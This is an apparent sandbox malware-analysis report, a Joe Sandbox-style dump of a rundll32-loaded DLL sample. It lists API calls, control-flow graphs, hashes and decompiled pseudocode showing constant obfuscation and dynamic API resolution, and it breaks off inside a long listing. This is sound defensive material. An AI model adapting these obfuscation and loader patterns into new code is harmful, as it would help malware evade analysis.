                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714421763-0
                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001B80 Relevance: 3.1, APIs: 2, Instructions: 98COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1263568516-0
                                                                                                                    • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                    • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                    • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                    • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3296620671-0
                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00337F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 275 337f5d-337ff1 call 3420b9 call 34aa30 CreateProcessW
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0033AD99,?,?,?,181C8C04,0033AD99), ref: 00337FEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction ID: 0701aadd2b4b147738078cafe20359d42976d3039309f53fe3c3f7d9505ad911
                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                    • Instruction Fuzzy Hash: D3110372402128BBDF629F91DD09CEF7FB9EF093A4F108144FA0925121D2729A60EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003446BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 3446bb-34473b call 3420b9 call 34aa30 SHGetFolderPathW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E003446BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003420B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0034AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                    0x003446d5
                                                                                                                    0x003446da
                                                                                                                    0x003446e4
                                                                                                                    0x003446ec
                                                                                                                    0x003446f3
                                                                                                                    0x003446f7
                                                                                                                    0x003446fe
                                                                                                                    0x00344705
                                                                                                                    0x0034470c
                                                                                                                    0x00344724
                                                                                                                    0x00344735
                                                                                                                    0x0034473b

                                                                                                                    APIs
                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00344735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1514166925-0
                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction ID: 0333af44a42b188a917a5526e03c0f38392386751fe5ef18ae2e46143294aa49
                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                    • Instruction Fuzzy Hash: BA012C75801218BBCF15AFD5DC098DFBFB8EF45394F108145F91826212D2759A60DBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003393ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 285 3393ed-339461 call 34aa30 ExitProcess
                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E003393ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0034AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                    0x003393f3
                                                                                                                    0x00339405
                                                                                                                    0x00339411
                                                                                                                    0x00339412
                                                                                                                    0x00339413
                                                                                                                    0x0033941a
                                                                                                                    0x00339421
                                                                                                                    0x00339428
                                                                                                                    0x00339433
                                                                                                                    0x00339436
                                                                                                                    0x0033943d
                                                                                                                    0x00339444
                                                                                                                    0x00339451
                                                                                                                    0x0033945b

                                                                                                                    APIs
                                                                                                                    • ExitProcess.KERNELBASE(00000000), ref: 0033945B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 621844428-0
                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction ID: 7407063ecc112861e3c8e1ddb3f03f449f46e8173bff9c2831c6dbce1decbdff
                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                    • Instruction Fuzzy Hash: E8F03C71901308FBEB04DBE8DA4699DFBF4EB50314F2081A9DA04B7261E7705F459B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 305 33b23c-33b2c6 call 3420b9 call 34aa30 lstrcmpiW
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0033B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003420B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0034AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                    0x0033b23f
                                                                                                                    0x0033b240
                                                                                                                    0x0033b241
                                                                                                                    0x0033b244
                                                                                                                    0x0033b247
                                                                                                                    0x0033b24a
                                                                                                                    0x0033b24e
                                                                                                                    0x0033b24f
                                                                                                                    0x0033b254
                                                                                                                    0x0033b25e
                                                                                                                    0x0033b26a
                                                                                                                    0x0033b271
                                                                                                                    0x0033b278
                                                                                                                    0x0033b27f
                                                                                                                    0x0033b286
                                                                                                                    0x0033b28d
                                                                                                                    0x0033b294
                                                                                                                    0x0033b29b
                                                                                                                    0x0033b2b3
                                                                                                                    0x0033b2c1
                                                                                                                    0x0033b2c6

                                                                                                                    APIs
                                                                                                                    • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0033B2C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1586166983-0
                                                                                                                    • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction ID: 49d9bebc41868a22b3464def9f4896f55132f0d6ecda6bead3309295d397262c
                                                                                                                    • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                    • Instruction Fuzzy Hash: E40116B2C04608FFDF45DFD4DD468AEBFB5EB44304F208188B90566262E3729B60AB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0034E395 Relevance: 24.5, Strings: 19, Instructions: 720COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0034E395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
				signed int _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				intOrPtr _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _t823;
				void* _t829;
				signed int* _t832;
				signed int _t833;
				signed int _t845;
				signed int _t858;
				signed int _t862;
				intOrPtr _t868;
				signed int _t888;
				void* _t939;
				void* _t948;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t977;
				signed int _t981;
				signed int _t984;
				signed int _t985;
				signed int* _t988;
				void* _t991;

				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_v8 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx & 0x0000ffff);
				E003420B9(__ecx & 0x0000ffff);
				_v284 = 0x99c43c;
				_t988 =  &(( &_v288)[0xd]);
				_v284 = _v284 + 0xbb14;
				_v284 = _v284 >> 0xb;
				_v284 = _v284 ^ 0x0000134f;
				_t862 = 0;
				_v120 = 0x27310;
				_t977 = 0x329d839;
				_t956 = 0x43;
				_v120 = _v120 / _t956;
				_v120 = _v120 + 0xe2f5;
				_v120 = _v120 ^ 0x0000ec43;
				_v36 = 0x50046c;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x00a00810;
				_v116 = 0x7f268a;
				_v116 = _v116 ^ 0x5f915552;
				_t957 = 0x1b;
				_v276 = 0;
				_v116 = _v116 * 0x3e;
				_v116 = _v116 ^ 0x3bc08e50;
				_v228 = 0xb299e8;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 << 0x10;
				_v228 = _v228 * 0x42;
				_v228 = _v228 ^ 0xb8144000;
				_v64 = 0x620921;
				_v64 = _v64 | 0xbe88b167;
				_v64 = _v64 ^ 0xbeaab967;
				_v172 = 0xae09b0;
				_v172 = _v172 | 0xde677f7d;
				_v172 = _v172 ^ 0xc5d04777;
				_v172 = _v172 ^ 0x1b3b388a;
				_v132 = 0xc06abb;
				_v132 = _v132 ^ 0x2b7b17d1;
				_v132 = _v132 / _t957;
				_v132 = _v132 ^ 0x059ea5d4;
				_v236 = 0x9fdac6;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0x9b65;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x051f8b2b;
				_v108 = 0xc74878;
				_v108 = _v108 + 0x314b;
				_v108 = _v108 * 0x41;
				_v108 = _v108 ^ 0x32a5e883;
				_v196 = 0x1587ec;
				_v196 = _v196 ^ 0x07496474;
				_v196 = _v196 >> 7;
				_t958 = 0x2c;
				_v196 = _v196 / _t958;
				_v196 = _v196 ^ 0x000054ad;
				_v244 = 0xbebf62;
				_v244 = _v244 << 0xb;
				_v244 = _v244 + 0xffffca16;
				_v244 = _v244 << 0xe;
				_v244 = _v244 ^ 0x36858000;
				_v72 = 0x750de5;
				_v72 = _v72 | 0xb336b270;
				_v72 = _v72 ^ 0xb377bff5;
				_v256 = 0xc175fb;
				_t984 = 0x72;
				_t959 = 0x28;
				_v256 = _v256 * 0x26;
				_v256 = _v256 >> 5;
				_v256 = _v256 ^ 0xfb5a89da;
				_v256 = _v256 ^ 0xfbbf3581;
				_v76 = 0x1a7820;
				_v76 = _v76 | 0xb8d3f172;
				_v76 = _v76 ^ 0xb8dbf96d;
				_v224 = 0x97ff87;
				_v224 = _v224 / _t984;
				_v224 = _v224 >> 6;
				_v224 = _v224 * 0x5d;
				_v224 = _v224 ^ 0x0001effe;
				_v40 = 0x7c0450;
				_v40 = _v40 / _t959;
				_v40 = _v40 ^ 0x000319b6;
				_v136 = 0x260fad;
				_v136 = _v136 + 0x622a;
				_t960 = 0x1c;
				_v136 = _v136 / _t960;
				_v136 = _v136 ^ 0x00015e7e;
				_v288 = 0x61f743;
				_t961 = 0x66;
				_v288 = _v288 * 0x25;
				_v288 = _v288 ^ 0x0e2ee817;
				_v288 = 0x858eca;
				_v288 = _v288 / _t984;
				_v288 = _v288 ^ 0x0002de1a;
				_v280 = 0xcba1b8;
				_v280 = _v280 / _t961;
				_v280 = _v280 ^ 0xc2211053;
				_v280 = _v280 + 0xffff75b7;
				_v280 = _v280 ^ 0xc2279606;
				_v288 = 0x614b46;
				_v288 = _v288 >> 4;
				_v288 = _v288 ^ 0x000cf9c3;
				_v288 = 0x794624;
				_v288 = _v288 + 0xb4d0;
				_v288 = _v288 ^ 0x0072cd5b;
				_v288 = 0xcdbe83;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x00034ad6;
				_v288 = 0x24639d;
				_t962 = 0x28;
				_v288 = _v288 / _t962;
				_v288 = _v288 ^ 0x000e4507;
				_v288 = 0x4730ec;
				_t963 = 0x21;
				_v288 = _v288 / _t963;
				_v288 = _v288 ^ 0x0002fb4b;
				_v284 = 0xb301d9;
				_t964 = 0x4e;
				_v284 = _v284 / _t964;
				_v284 = _v284 + 0x8c1d;
				_v284 = _v284 ^ 0x00061f34;
				_v280 = 0xfdcbf7;
				_v280 = _v280 + 0x27a;
				_v280 = _v280 + 0xffff891b;
				_t965 = 0x46;
				_v280 = _v280 / _t965;
				_v280 = _v280 ^ 0x0008575c;
				_v284 = 0xc1d3a0;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 << 2;
				_v284 = _v284 ^ 0x000b0f76;
				_v112 = 0xeee25;
				_v112 = _v112 << 0xc;
				_v112 = _v112 << 4;
				_v112 = _v112 ^ 0xee2c14e7;
				_v180 = 0x8a49b3;
				_v180 = _v180 | 0xb0d6dc69;
				_v180 = _v180 + 0xffffa02a;
				_v180 = _v180 | 0x7fd27f38;
				_v180 = _v180 ^ 0xffd81443;
				_v152 = 0x628374;
				_v152 = _v152 >> 2;
				_v152 = _v152 + 0xffff73d9;
				_t966 = 0x2e;
				_v152 = _v152 / _t966;
				_v152 = _v152 ^ 0x0001ef4a;
				_v28 = 0xe4a1af;
				_v28 = _v28 + 0x32bc;
				_v28 = _v28 ^ 0x00ec33da;
				_v160 = 0x595a50;
				_v160 = _v160 + 0xffffdbfa;
				_v160 = _v160 + 0xffffb344;
				_t967 = 0x36;
				_v160 = _v160 / _t967;
				_v160 = _v160 ^ 0x0006861f;
				_v88 = 0x4d7ad3;
				_v88 = _v88 + 0xc28a;
				_v88 = _v88 ^ 0x004ca34c;
				_v48 = 0xf1782b;
				_v48 = _v48 ^ 0xe8a77c51;
				_v48 = _v48 ^ 0xe85593aa;
				_v100 = 0x42ea8e;
				_t985 = 0x2a;
				_v100 = _v100 / _t985;
				_v100 = _v100 ^ 0x000caa85;
				_v148 = 0xa48e68;
				_t968 = 6;
				_v148 = _v148 / _t968;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xb6d58e9e;
				_v252 = 0x4ff2e7;
				_t969 = 0xc;
				_v252 = _v252 / _t969;
				_v252 = _v252 << 6;
				_v252 = _v252 << 0xc;
				_v252 = _v252 ^ 0xa6466867;
				_v80 = 0x4d7637;
				_v80 = _v80 + 0xd199;
				_v80 = _v80 ^ 0x004dfa45;
				_v24 = 0xfee4b3;
